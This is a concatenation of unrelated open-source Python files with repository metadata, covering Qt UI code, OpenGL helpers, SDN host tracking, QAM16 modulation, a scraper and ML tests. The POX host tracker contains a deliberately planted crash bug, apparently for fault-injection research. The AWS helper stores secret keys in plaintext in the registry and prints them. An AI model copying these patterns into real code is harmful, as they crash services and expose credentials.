"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> erase_msg_t();</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> }</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">}</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">void erase_msg_t(void) {</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> for (i = 0; i < 8; i++) msg_t[i] = \'9\';</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">}</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>", None))
self.tabPrincipal.setTabText(self.tabPrincipal.indexOf(self.tab_sobre), _translate("PyQtGate", "Sobre", None))
self.l_filename.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Último arquivo salvo ou lido. Um asterisco na frente indica que a última aquisição ainda não foi salva.</p></body></html>", None))
self.l_filename.setText(_translate("PyQtGate", "*Arquivo:", None))
from pyqtgraph import PlotWidget
|
jocoteles/photogate
|
PyQtGate/User_interface.py
|
Python
|
gpl-3.0
| 62,173
|
from OpenGL.GL import glUniformMatrix4fv, glUniform2fv, glUniform4fv
class MatrixUniform:
    """Wraps a 4x4 matrix value for upload to a GLSL uniform."""

    def __init__(self, data):
        # Raw matrix data; handed to OpenGL untouched at bind time.
        self._data = data

    def bind(self, uniform_location):
        """Upload the stored matrix to *uniform_location* (one matrix, no transpose)."""
        glUniformMatrix4fv(uniform_location, 1, False, self._data)
class VectorUniform:
    """Wraps a vec2 or vec4 value for upload to a GLSL uniform."""

    def __init__(self, data):
        # Vector components; the length (2 or 4) selects the GL call at bind time.
        self._data = data

    def bind(self, uniform_location):
        """Upload the stored vector; raises NotImplementedError for other lengths."""
        size = len(self._data)
        if size == 2:
            glUniform2fv(uniform_location, 1, self._data)
            return
        if size == 4:
            glUniform4fv(uniform_location, 1, self._data)
            return
        raise NotImplementedError(self._data)
|
nicholasbishop/bel
|
bel/uniform.py
|
Python
|
gpl-3.0
| 697
|
from _winreg import *
import boto3
import botocore
import os
def GetCredentialsFromUser():
print "IN GetCredentialsFromUser"
try:
ASKI = os.environ['AWS_ACCESS_KEY_ID']
except:
ASKI = raw_input("\n\nAWS Access Key ID: ")
try:
ASAK = os.environ['AWS_SECRET_ACCESS_KEY']
except:
ASAK = raw_input("\nAWS Secret Access Key: ")
return(ASAK,ASKI)
def ReadReg(wreg):
print "IN ReadRegistry"
try:
s3u_root_key = OpenKey(wreg, 'SOFTWARE\\AWS')
print "AWS key found!"
aws_secret_access_key = QueryValueEx(s3u_root_key, "ASAK")
aws_secret_key_id = QueryValueEx(s3u_root_key, "ASKI")
return(aws_secret_access_key, aws_secret_key_id)
except EnvironmentError:
print "AWS not installed. Creating..."
s3u_root_key = CreateKey(wreg, 'SOFTWARE\\AWS')
ASAK, ASKI = GetCredentialsFromUser()
SetValueEx(s3u_root_key, 'ASAK',0, REG_SZ, ASAK)
SetValueEx(s3u_root_key, 'ASKI',0, REG_SZ, ASKI)
CloseKey(s3u_root_key)
# let's get started
#
def LetsGetStarted():
print "LET'S GET STARTED"
try:
wreg = ConnectRegistry(None, HKEY_CURRENT_USER)
asak, aski = ReadReg(wreg)
aski = aski[0]
asak = asak[0]
print aski
print asak
s3 = boto3.resource('s3', aws_access_key_id=aski, aws_secret_access_key=asak)
for bucket in s3.buckets.all():
print(bucket.name)
except:
print "Something broke"
if __name__ == "__main__":
    # Script entry point: run the demo only when executed directly, not on import.
    LetsGetStarted()
|
pktomlinson/awsregkeys
|
readwinreg.py
|
Python
|
gpl-3.0
| 1,449
|
class Communicator:
    """Key/value command messaging over the micro:bit radio.

    NOTE(review): relies on the `radio` module being imported at file scope --
    confirm against the full file.
    """

    def __init__(self, group):
        """Turn the radio on and join the given radio group."""
        self.group = group
        radio.on()
        radio.config(group=group)

    def send_command(self, command, value):
        """Broadcast a command as ':'-joined 'key,value' pairs."""
        payload = {}
        payload["command"] = command
        payload["value"] = value
        parts = [str(key) + "," + str(payload[key]) for key in payload]
        radio.send(":".join(parts))

    def wait_for_command(self):
        """Block until a radio message arrives, then parse it back into a dict."""
        msg = None
        while not msg:
            msg = radio.receive()
        parsed = {}
        for pair in msg.split(":"):
            key, value = pair.split(",")
            parsed[key] = value
        return parsed
|
mdaudali/AdventureBit-MicroBit-Project
|
utilities.py
|
Python
|
gpl-3.0
| 639
|
# Copyright 2011
#
# Author: Dorgival Guedes
# Author: Kyriakos Zarifis
#
# This file is part of POX.
# Some of the arp/openflow-related code was borrowed from dumb_l3_switch.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
Keep track of hosts in the network, where they are and how they are
configured (at least MAC/IP addresses)
For the time being, it keeps tables with the information; later, it should
transfer that information to Topology and handle just the actual
discovery/update of host information.
Timer configuration can be changed when needed (e.g., for debugging) using
the launch facility (check timeoutSec dict and PingCtrl.pingLim).
"""
from pox.core import core
import pox
log = core.getLogger()
from pox.lib.packet.ethernet import ethernet
from pox.lib.packet.ipv4 import ipv4
from pox.lib.packet.arp import arp
from pox.lib.graph.nom import *
from pox.lib.recoco.recoco import Timer
from pox.lib.addresses import EthAddr, IPAddr
import pox.openflow.libopenflow_01 as of
import pox.openflow.discovery as discovery
from pox.lib.revent.revent import *
import time
import string
# Times (in seconds) to use for the different timeouts:
timeoutSec = dict(
  arpAware=60*2,   # Quiet ARP-responding entries are pinged after this
  arpSilent=60*20, # This is for quiet entries not known to answer ARP
  arpReply=4,      # Time to wait for an ARP reply before retrial
  timerInterval=5, # Seconds between timer routine activations
  entryMove=60     # Minimum expected time to move a physical entry
  )
# Good values for testing:
# --arpAware=15 --arpSilent=45 --arpReply=1 --entryMove=4
# Another parameter that may be used:
# --pingLim=2
class Alive (object):
  """Tracks when an entry was last seen and decides when it has gone stale."""

  def __init__ (self, livelinessInterval=timeoutSec['arpAware']):
    # Stamp creation time; refresh() re-stamps on every sighting.
    self.lastTimeSeen = time.time()
    self.interval = livelinessInterval

  def expired (self):
    """True once more than `interval` seconds have passed since the last sighting."""
    deadline = self.lastTimeSeen + self.interval
    return time.time() > deadline

  def refresh (self):
    """Record that the entry was just seen."""
    self.lastTimeSeen = time.time()
class PingCtrl (Alive):
  """Bookkeeping for outstanding ARP pings sent to a host."""

  # Number of unanswered ARP pings tolerated before declaring failure
  pingLim=3

  def __init__ (self):
    # A ping entry goes stale on the (short) arpReply timeout.
    Alive.__init__(self, timeoutSec['arpReply'])
    self.pending = 0

  def sent (self):
    """Note that one more ping went out (and that the entry is alive)."""
    self.refresh()
    self.pending = self.pending + 1

  def failed (self):
    """True when more pings are outstanding than the allowed limit."""
    return self.pending > PingCtrl.pingLim

  def received (self):
    """A reply arrived; clear any pending ping timeouts."""
    self.pending = 0
class IpEntry (Alive):
  """
  One IP address observed for a MAC entry (stored in macEntry.ipAddrs).

  ARP-responding addresses use the shorter arpAware timeout; addresses never
  seen answering ARP get the much longer arpSilent timeout.  No back-reference
  to the owning macEntry is kept; the code does not currently need one.
  """
  def __init__ (self, hasARP):
    interval = timeoutSec['arpAware'] if hasARP else timeoutSec['arpSilent']
    Alive.__init__(self, interval)
    self.hasARP = hasARP
    self.pings = PingCtrl()

  def setHasARP (self):
    """Promote a silent entry to ARP-aware, tightening its timeout."""
    if not self.hasARP:
      self.hasARP = True
      self.interval = timeoutSec['arpAware']
class HostTracker (EventMixin):
  """
  Learns hosts from PacketIn events and mirrors them into the NOM topology.

  Raises HostJoin when a new host is learned; the expiry path that would
  raise HostLeave is currently disabled (see __init__).

  NOTE(review): this is the deliberately buggy variant (see the SYNTHETIC BUG
  marker in _handle_PacketIn) -- it hard-exits the process after
  max_migrations observed host moves.  Do not "fix" without understanding
  the fault-injection harness it belongs to.
  """
  # Number of host moves after which the synthetic bug terminates the process
  max_migrations = 300

  # Events this tracker can raise
  _eventMixin_events = set([
    HostJoin, # Defined in pox.lib.graph
    HostLeave,
    ])

  def __init__ (self):
    # Timeout checking is disabled: the recurring timer below is commented
    # out, so _check_timeouts is never actually invoked.
    #self._t = Timer(timeoutSec['timerInterval'],
    #    self._check_timeouts, recurring=True)
    self.topology = core.topology
    self.listenTo(core)
    log.info("HostTracker ready")
    # Counts host relocations seen so far (feeds the synthetic bug)
    self.migrations_observed = 0

  def sendPing(self, macEntry, ipAddr):
    """
    Send an ARP request ("ping") for ipAddr out of the switch port where
    macEntry was learned.  On a successful send the ping is recorded on the
    IpEntry; on a failed send the (stale) IP mapping is dropped.
    """
    r = arp() # Builds an "ETH/IP any-to-any ARP packet
    r.opcode = arp.REQUEST
    r.hwdst = macEntry.macaddr
    r.protodst = ipAddr
    # src is ETHER_ANY, IP_ANY
    e = ethernet(type=ethernet.ARP_TYPE, src=r.hwsrc, dst=r.hwdst)
    e.set_payload(r)
    log.debug("%i %i sending ARP REQ to %s %s",
              macEntry.dpid, macEntry.port, str(r.hwdst), str(r.protodst))
    msg = of.ofp_packet_out(data = e.pack(),
                            action = of.ofp_action_output(port = macEntry.port))
    if core.openflow.sendToDPID(macEntry.dpid, msg.pack()):
      ipEntry = macEntry.ipAddrs[ipAddr]
      ipEntry.pings.sent()
    else:
      # macEntry is stale, remove it.
      log.debug("%i %i ERROR sending ARP REQ to %s %s",
                macEntry.dpid, macEntry.port, str(r.hwdst), str(r.protodst))
      del macEntry.ipAddrs[ipAddr]
    return

  def getSrcIPandARP(self, packet):
    """
    This auxiliary function returns the source IPv4 address for packets that
    have one (IPv4, ARPv4). Returns None otherwise.

    Returns an (ip_or_None, hasARP) pair; hasARP is True only for well-formed
    Ethernet/IPv4 ARP packets with a non-zero source protocol address.
    """
    if isinstance(packet, ipv4):
      log.debug("IP %s => %s",str(packet.srcip),str(packet.dstip))
      return ( packet.srcip, False )
    elif isinstance(packet, arp):
      log.debug("ARP %s %s => %s",
                {arp.REQUEST:"request",arp.REPLY:"reply"}.get(packet.opcode,
                    'op:%i' % (packet.opcode,)),
                str(packet.protosrc), str(packet.protodst))
      if packet.hwtype == arp.HW_TYPE_ETHERNET and \
         packet.prototype == arp.PROTO_TYPE_IP and \
         packet.protosrc != 0:
        return ( packet.protosrc, True )
    return ( None, False )

  def updateIPInfo(self, pckt_srcip, macEntry, hasARP):
    """ If there is IP info in the incoming packet, update the macEntry
    accordingly. In the past we assumed a 1:1 mapping between MAC and IP
    addresses, but removed that restriction later to accommodate cases
    like virtual interfaces (1:n) and distributed packet rewriting (n:1)
    """
    if pckt_srcip in macEntry.ipAddrs:
      # that entry already has that IP
      ipEntry = macEntry.ipAddrs[pckt_srcip]
      ipEntry.refresh()
      log.debug("%s already has IP %s, refreshing",
                str(macEntry), str(pckt_srcip) )
    else:
      # new mapping
      ipEntry = IpEntry(hasARP)
      macEntry.ipAddrs[pckt_srcip] = ipEntry
      log.info("Learned %s got IP %s", str(macEntry), str(pckt_srcip) )
    if hasARP:
      # The source spoke ARP, so no pings are outstanding for it
      ipEntry.pings.received()

  def _handle_GoingUpEvent (self, event):
    # Once the core is up, subscribe to openflow events (PacketIn below)
    self.listenTo(core.openflow)

  def _handle_PacketIn (self, event):
    """
    Populate MAC and IP tables based on incoming packets.
    Handles only packets from ports identified as not switch-only.
    If a MAC was not seen before, insert it in the MAC table;
    otherwise, update table and entry.
    If packet has a source IP, update that info for the macEntry (may require
    removing the info from another entry previously with that IP address).
    It does not forward any packets, just extracts info from them.
    """
    dpid = event.connection.dpid
    inport = event.port
    packet = event.parse()
    if not packet.parsed:
      log.warning("%i %i ignoring unparsed packet", dpid, inport)
      return
    if packet.type == ethernet.LLDP_TYPE: # Ignore LLDP packets
      return
    if core.openflow_discovery.isSwitchOnlyPort(dpid, inport):
      # No host should be right behind a switch-only port
      log.debug("Ignoring packetIn at switch-only port (%i, %i)", dpid, inport)
      return
    log.debug("PacketIn: %i %i ETH %s => %s",
              dpid, inport, str(packet.src), str(packet.dst))
    mac = packet.src
    # Learn or update dpid/port/MAC info
    host = core.topology.find(IsInstance(Host), macstr=mac.toStr())#, one=True)
    """
    This should be unnecessary. Check if find()'s 'one=True' works
    """
    # find() returns a list; take the first match (if any)
    if host:
      host = host[0]
    if not host:
      # there is no known host by that MAC
      log.info("Learned %s", packet.src)
      (pckt_srcip, hasARP) = self.getSrcIPandARP(packet.next)
      if pckt_srcip:
        newHost = Host(mac.toStr(), pckt_srcip, (dpid, inport))
      else:
        newHost = Host(mac.toStr(), None, (dpid, inport))
      self.topology.addEntity(newHost)
      self.raiseEventNoErrors(HostJoin, newHost)
      # Create new access link and add it on the NOM
      newLink = AccessLink(dpid, inport, newHost.macstr)
      self.topology.addEntity(newLink)
      self.raiseEventNoErrors(LinkEvent, True, newLink)
    elif host.location != (dpid, inport):
      # there is already an entry of host with that MAC, but host has moved
      # should we raise a HostMoved event (at the end)?
      log.info("Learned %s moved to %i %i", host.mac, dpid, inport)
      # SYNTHETIC BUG
      # Deliberately planted fault for fault-injection experiments: after
      # max_migrations host moves, print and hard-exit the process.
      self.migrations_observed += 1
      if self.migrations_observed == HostTracker.max_migrations:
        import os
        print "YOU FOUND THE MEMORY LEAK! 10 POINTS TO SLYTHERIN"
        os._exit(1)
      """
      # if there has not been long since heard from it...
      if time.time() - macEntry.lastTimeSeen < timeoutSec['entryMove']:
        log.warning("Possible duplicate: %s at time %i, now (%i %i), time %i",
                    str(macEntry), macEntry.lastTimeSeen(),
                    dpid, inport, time.time())
      # should we create a whole new entry, or keep the previous host info?
      # for now, we keep it: IP info, answers pings, etc.
      """
      switch = core.topology.getEntityByID(dpid)
      port = inport
      host.location = (switch, port)
      # TODO, remove old access link from NOM and add new one
    return

  def _check_timeouts(self):
    """
    Expire stale IP entries (pinging them first) and then stale MAC entries.

    NOTE(review): currently dead code -- the timer in __init__ is commented
    out.  It also references self.entryByMAC, which is never assigned in this
    class; it mutates macEntry.ipAddrs while iterating its items(); and the
    inner cleanup loop iterates `ip` but indexes/logs with `ip_addr` (the
    leftover variable from the earlier loop).  All of these would need
    attention before re-enabling the timer.
    """
    for macEntry in self.entryByMAC.values():
      entryPinged = False
      for ip_addr, ipEntry in macEntry.ipAddrs.items():
        if ipEntry.expired():
          if ipEntry.pings.failed():
            del macEntry.ipAddrs[ip_addr]
            log.info("Entry %s: IP address %s expired",
                     str(macEntry), str(ip_addr) )
          else:
            self.sendPing(macEntry,ip_addr)
            ipEntry.pings.sent()
            entryPinged = True
      if macEntry.expired() and not entryPinged:
        log.info("Entry %s expired", str(macEntry))
        # sanity check: there should be no IP addresses left
        if len(macEntry.ipAddrs) > 0:
          for ip in macEntry.ipAddrs.keys():
            log.warning("Entry %s expired but still had IP address %s",
                        str(macEntry), str(ip_addr) )
            del macEntry.ipAddrs[ip_addr]
        del self.entryByMAC[macEntry.macaddr]
|
jmiserez/pox
|
pox/host_tracker/buggy_host_tracker.py
|
Python
|
gpl-3.0
| 10,685
|
#
# Copyright 2005,2006 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# See gnuradio-examples/python/digital for examples
"""
QAM16 modulation and demodulation.
"""
from gnuradio import gr, gru, modulation_utils
from math import pi, sqrt
import qam
import cmath
from pprint import pprint
# default values (used in __init__ and add_options)
_def_samples_per_symbol = 2
_def_excess_bw = 0.35
_def_gray_code = True
_def_verbose = False
_def_log = False

# Loop/clock-recovery defaults; these names appear only in the
# (unimplemented) qam16_demod constructor signature below.
_def_costas_alpha = None
_def_gain_mu = 0.03
_def_mu = 0.05
_def_omega_relative_limit = 0.005
# /////////////////////////////////////////////////////////////////////////////
# QAM16 modulator
# /////////////////////////////////////////////////////////////////////////////
class qam16_mod(gr.hier_block):
    """RRC-filtered QAM16 modulator hierarchical block (bytes in, complex baseband out)."""

    def __init__(self, fg,
                 samples_per_symbol=_def_samples_per_symbol,
                 excess_bw=_def_excess_bw,
                 gray_code=_def_gray_code,
                 verbose=_def_verbose,
                 log=_def_log):
        """
        Hierarchical block for RRC-filtered QAM16 modulation.

        The input is a byte stream (unsigned char) and the
        output is the complex modulated signal at baseband.

        @param fg: flow graph
        @type fg: flow graph
        @param samples_per_symbol: samples per symbol >= 2
        @type samples_per_symbol: integer
        @param excess_bw: Root-raised cosine filter excess bandwidth
        @type excess_bw: float
        @param gray_code: Tell modulator to Gray code the bits
        @type gray_code: bool
        @param verbose: Print information about modulator?
        @type verbose: bool
        @param log: Print modulation data to files?
        @type log: bool
        """
        self._fg = fg
        self._samples_per_symbol = samples_per_symbol
        self._excess_bw = excess_bw
        self._gray_code = gray_code

        if not isinstance(samples_per_symbol, int) or samples_per_symbol < 2:
            raise TypeError, ("sbp must be an integer >= 2, is %d" % samples_per_symbol)

        # RRC filter length scales with the interpolation factor
        ntaps = 11 * samples_per_symbol

        # Number of constellation points: 2**4 = 16 for QAM16
        arity = pow(2, self.bits_per_symbol())

        # turn bytes into k-bit vectors
        self.bytes2chunks = \
          gr.packed_to_unpacked_bb(self.bits_per_symbol(), gr.GR_MSB_FIRST)

        if self._gray_code:
            self.symbol_mapper = gr.map_bb(qam.binary_to_gray[arity])
        else:
            self.symbol_mapper = gr.map_bb(qam.binary_to_ungray[arity])

        # Differential encoding makes the signal robust to phase ambiguity
        self.diffenc = gr.diff_encoder_bb(arity)

        # No constellation rotation is applied (rot == 1.0)
        rot = 1.0
        print "constellation with %d arity" % arity
        rotated_const = map(lambda pt: pt * rot, qam.constellation[arity])
        self.chunks2symbols = gr.chunks_to_symbols_bc(rotated_const)

        # pulse shaping filter
        self.rrc_taps = gr.firdes.root_raised_cosine(
            self._samples_per_symbol, # gain (sps since we're interpolating by sps)
            self._samples_per_symbol, # sampling rate
            1.0,                      # symbol rate
            self._excess_bw,          # excess bandwidth (roll-off factor)
            ntaps)

        self.rrc_filter = gr.interp_fir_filter_ccf(self._samples_per_symbol, self.rrc_taps)

        if verbose:
            self._print_verbage()

        if log:
            self._setup_logging()

        # Connect & Initialize base class
        self._fg.connect(self.bytes2chunks, self.symbol_mapper, self.diffenc,
                         self.chunks2symbols, self.rrc_filter)
        gr.hier_block.__init__(self, self._fg, self.bytes2chunks, self.rrc_filter)

    def samples_per_symbol(self):
        # Accessor for the configured interpolation factor
        return self._samples_per_symbol

    def bits_per_symbol(self=None):   # staticmethod that's also callable on an instance
        return 4
    bits_per_symbol = staticmethod(bits_per_symbol)   # make it a static method.  RTFM

    def _print_verbage(self):
        # Dump the modulator configuration to stdout
        print "bits per symbol = %d" % self.bits_per_symbol()
        print "Gray code = %s" % self._gray_code
        print "RRS roll-off factor = %f" % self._excess_bw

    def _setup_logging(self):
        # Tap every stage of the chain into a .dat file for offline inspection
        print "Modulation logging turned on."
        self._fg.connect(self.bytes2chunks,
                         gr.file_sink(gr.sizeof_char, "bytes2chunks.dat"))
        self._fg.connect(self.symbol_mapper,
                         gr.file_sink(gr.sizeof_char, "graycoder.dat"))
        self._fg.connect(self.diffenc,
                         gr.file_sink(gr.sizeof_char, "diffenc.dat"))
        self._fg.connect(self.chunks2symbols,
                         gr.file_sink(gr.sizeof_gr_complex, "chunks2symbols.dat"))
        self._fg.connect(self.rrc_filter,
                         gr.file_sink(gr.sizeof_gr_complex, "rrc_filter.dat"))

    def add_options(parser):
        """
        Adds QAM modulation-specific options to the standard parser
        """
        parser.add_option("", "--excess-bw", type="float", default=_def_excess_bw,
                          help="set RRC excess bandwith factor [default=%default] (PSK)")
        parser.add_option("", "--no-gray-code", dest="gray_code",
                          action="store_false", default=_def_gray_code,
                          help="disable gray coding on modulated bits (PSK)")
    add_options=staticmethod(add_options)

    def extract_kwargs_from_options(options):
        """
        Given command line options, create dictionary suitable for passing to __init__
        """
        return modulation_utils.extract_kwargs_from_options(qam16_mod.__init__,
                                                            ('self', 'fg'), options)
    extract_kwargs_from_options=staticmethod(extract_kwargs_from_options)
# /////////////////////////////////////////////////////////////////////////////
# QAM16 demodulator
#
# /////////////////////////////////////////////////////////////////////////////
class qam16_demod(gr.hier_block):
    """Placeholder for the QAM16 demodulator; construction is not implemented yet."""

    def __init__(self, fg,
                 samples_per_symbol=_def_samples_per_symbol,
                 excess_bw=_def_excess_bw,
                 costas_alpha=_def_costas_alpha,
                 gain_mu=_def_gain_mu,
                 mu=_def_mu,
                 omega_relative_limit=_def_omega_relative_limit,
                 gray_code=_def_gray_code,
                 verbose=_def_verbose,
                 log=_def_log):
        """Accepts the standard demod parameters but builds nothing yet."""
        # TODO: wire up the actual demodulation chain.
        pass

    @staticmethod
    def bits_per_symbol(self=None):
        """QAM16 carries 4 bits per symbol (callable on class or instance)."""
        return 4
#
# Add these to the mod/demod registry
#
# NOT READY TO BE USED YET -- ENABLE AT YOUR OWN RISK
#modulation_utils.add_type_1_mod('qam16', qam16_mod)
#modulation_utils.add_type_1_demod('qam16', qam16_demod)
|
trnewman/VT-USRP-daughterboard-drivers_python
|
gnuradio-core/src/python/gnuradio/blksimpl/qam16.py
|
Python
|
gpl-3.0
| 7,447
|
# -*- coding: utf-8 -*-
import scrapy
import json
import re
class MeetingsSpider(scrapy.Spider):
    """Crawls the Leipzig OParl meetings endpoint, following pagination links."""

    name = "meetings"
    allowed_domains = ["ratsinfo.leipzig.de"]

    # Default listing URL, used unless a start_url attribute is supplied
    # (e.g. via `scrapy crawl meetings -a start_url=...`).
    _DEFAULT_URL = (
        "https://ratsinfo.leipzig.de/bi/oparl/1.0/meetings.asp?organization=2387"
    )

    def start_requests(self):
        """Kick off crawling at start_url (if set) or the default listing URL."""
        first_url = getattr(self, "start_url", self._DEFAULT_URL)
        yield scrapy.Request(url=first_url, callback=self.parse)

    def parse(self, response):
        """Yield each meeting on this page, then queue the next page if any."""
        self.logger.info("Parsing page: %s", response.url)
        body = json.loads(response.text)
        for meeting in body["data"]:
            yield meeting
        follow = body["links"].get("next")
        if follow is None:
            # Remember where pagination ended.
            self.last_url = response.url
        else:
            yield scrapy.Request(url=follow, callback=self.parse)
|
CodeforLeipzig/allris-scraper
|
allris/spiders/meetings.py
|
Python
|
gpl-3.0
| 843
|
"""
Test that Layers work as advertised.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
__author__ = "Han Altae-Tran and Bharath Ramsundar"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "GPL"
import numpy as np
import unittest
import deepchem as dc
from tensorflow.python.framework import test_util
class TestLayers(test_util.TensorFlowTestCase):
  """
  Test Layers.

  The tests in this class only do basic sanity checks to make sure that
  produced tensors have the right shape.
  """

  def setUp(self):
    super(TestLayers, self).setUp()
    # Scratch directory any test may write into
    self.root = '/tmp'

  def test_dense(self):
    """Tests dense layer class can be initialized."""
    with self.test_session() as sess:
      dense = dc.nn.Dense(32, input_dim=16)

  def test_dropout(self):
    """Tests that dropout can be initialized."""
    with self.test_session() as sess:
      dropout = dc.nn.Dropout(.5)

  def test_input(self):
    """Tests that inputs can be created."""
    with self.test_session() as sess:
      input_layer = dc.nn.Input(shape=(32,))

  #def test_batch_normalization(self):
  #  """Tests that batch normalization layers can be created."""

  def test_graph_convolution(self):
    """Tests that Graph Convolution transforms shapes correctly."""
    n_atoms = 5
    n_feat = 10
    nb_filter = 7
    with self.test_session() as sess:
      graph_topology = dc.nn.GraphTopology(n_feat)
      graph_conv_layer = dc.nn.GraphConv(nb_filter)
      X = graph_topology.get_input_placeholders()
      out = graph_conv_layer(X)
      # Output should be of shape (?, nb_filter)
      assert out.get_shape()[1] == nb_filter

  def test_graph_gather(self):
    """Tests that GraphGather transforms shapes correctly."""
    n_atoms = 5
    n_feat = 10
    batch_size = 3
    # NOTE(review): nb_filter is unused in this test.
    nb_filter = 7
    with self.test_session() as sess:
      graph_topology = dc.nn.GraphTopology(n_feat)
      graph_gather_layer = dc.nn.GraphGather(batch_size)
      X = graph_topology.get_input_placeholders()
      out = graph_gather_layer(X)
      # Output should be of shape (batch_size, n_feat)
      assert out.get_shape() == (batch_size, n_feat)

  def test_graph_pool(self):
    """Tests that GraphPool transforms shapes correctly."""
    n_atoms = 5
    n_feat = 10
    batch_size = 3
    nb_filter = 7
    # NOTE(review): only checks construction/call succeed; no shape assertion.
    with self.test_session() as sess:
      graph_topology = dc.nn.GraphTopology(n_feat)
      graph_pool_layer = dc.nn.GraphPool()
      X = graph_topology.get_input_placeholders()
      out = graph_pool_layer(X)

  def test_attn_lstm_embedding(self):
    """Test that attention LSTM computation works properly."""
    max_depth = 5
    n_test = 5
    n_support = 11
    n_feat = 10
    nb_filter = 7
    with self.test_session() as sess:
      graph_topology_test = dc.nn.GraphTopology(n_feat)
      graph_topology_support = dc.nn.GraphTopology(n_feat)
      test = graph_topology_test.get_input_placeholders()[0]
      support = graph_topology_support.get_input_placeholders()[0]
      attn_embedding_layer = dc.nn.AttnLSTMEmbedding(
          n_test, n_support, max_depth)
      # Try concatenating the two lists of placeholders
      # NOTE(review): feed_dict is built but never passed to a session run.
      feed_dict = {test: np.zeros((n_test, n_feat)),
                   support: np.zeros((n_support, n_feat))}
      test_out, support_out = attn_embedding_layer([test, support])
      assert test_out.get_shape() == (n_test, n_feat)
      assert support_out.get_shape()[1] == (n_feat)

  def test_resi_lstm_embedding(self):
    """Test that attention LSTM computation works properly."""
    max_depth = 5
    n_test = 5
    n_support = 11
    n_feat = 10
    nb_filter = 7
    with self.test_session() as sess:
      graph_topology_test = dc.nn.GraphTopology(n_feat)
      graph_topology_support = dc.nn.GraphTopology(n_feat)
      test = graph_topology_test.get_input_placeholders()[0]
      support = graph_topology_support.get_input_placeholders()[0]
      resi_embedding_layer = dc.nn.ResiLSTMEmbedding(
          n_test, n_support, max_depth)
      # Try concatenating the two lists of placeholders
      # NOTE(review): feed_dict is built but never passed to a session run.
      feed_dict = {test: np.zeros((n_test, n_feat)),
                   support: np.zeros((n_support, n_feat))}
      test_out, support_out = resi_embedding_layer([test, support])
      assert test_out.get_shape() == (n_test, n_feat)
      assert support_out.get_shape()[1] == (n_feat)
|
bowenliu16/deepchem
|
deepchem/nn/tests/test_layers.py
|
Python
|
gpl-3.0
| 4,390
|
#!/usr/bin/env python2.6
# -*- coding: utf-8 -*-
import sys
import logging
### RESTful service routing
from optparse import OptionParser
from bottle import route, run, debug, request, static_file
# Maps single-letter sensor codes to human-readable display names.
_SENSOR_FULL_NAMES= {
    "t" : u"Temperature (ºC)",
    "p" : "Pressure (Pascal)",
    "a" : "Air Quality",
    "l" : "Luminosity (Lux)",
    "n" : "Noise (dB)",
    "h" : "Humidity",
}
# Maps each sensor's URL path segment to its single-letter code.
_SENSOR_PATH= {
    "temperature" : "t",
    "pressure" : "p",
    "air_quality" : "a",
    "luminosity" : "l",
    "noise" : "n",
    "humidity" : "h",
}
# Per-sensor min/max bounds for raw readings.
# NOTE(review): consumers of these bounds are not visible in this chunk.
_SENSOR_BOUNDARIES= {
    "t" : {"min" : 0, "max" : 50  },
    "p" : {"min" : 0, "max" : 100 },
    "a" : {"min" : 0, "max" : 200 },
    "l" : {"min" : 0, "max" : 1024},
    "n" : {"min" : 0, "max" : 1024},
    "h" : {"min" : 0, "max" : 1024},
}
# Raw-to-display conversion per sensor (e.g. temperature appears to arrive in
# tenths of a degree, pressure in hundredths -- TODO confirm against firmware).
# NOTE(review): under Python 2 these are integer divisions for int inputs.
_SENSOR_FUNCTORS= {
    "t" : (lambda t: t/10),
    "p" : (lambda p: p/100),
    "a" : (lambda a: a),
    "l" : (lambda a: a),
    "n" : (lambda a: a),
    "h" : (lambda a: a),
}
_SENSOR_TEMPLATE = """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Pollux'nz City Sensor charts -- %(uuid)s</title>
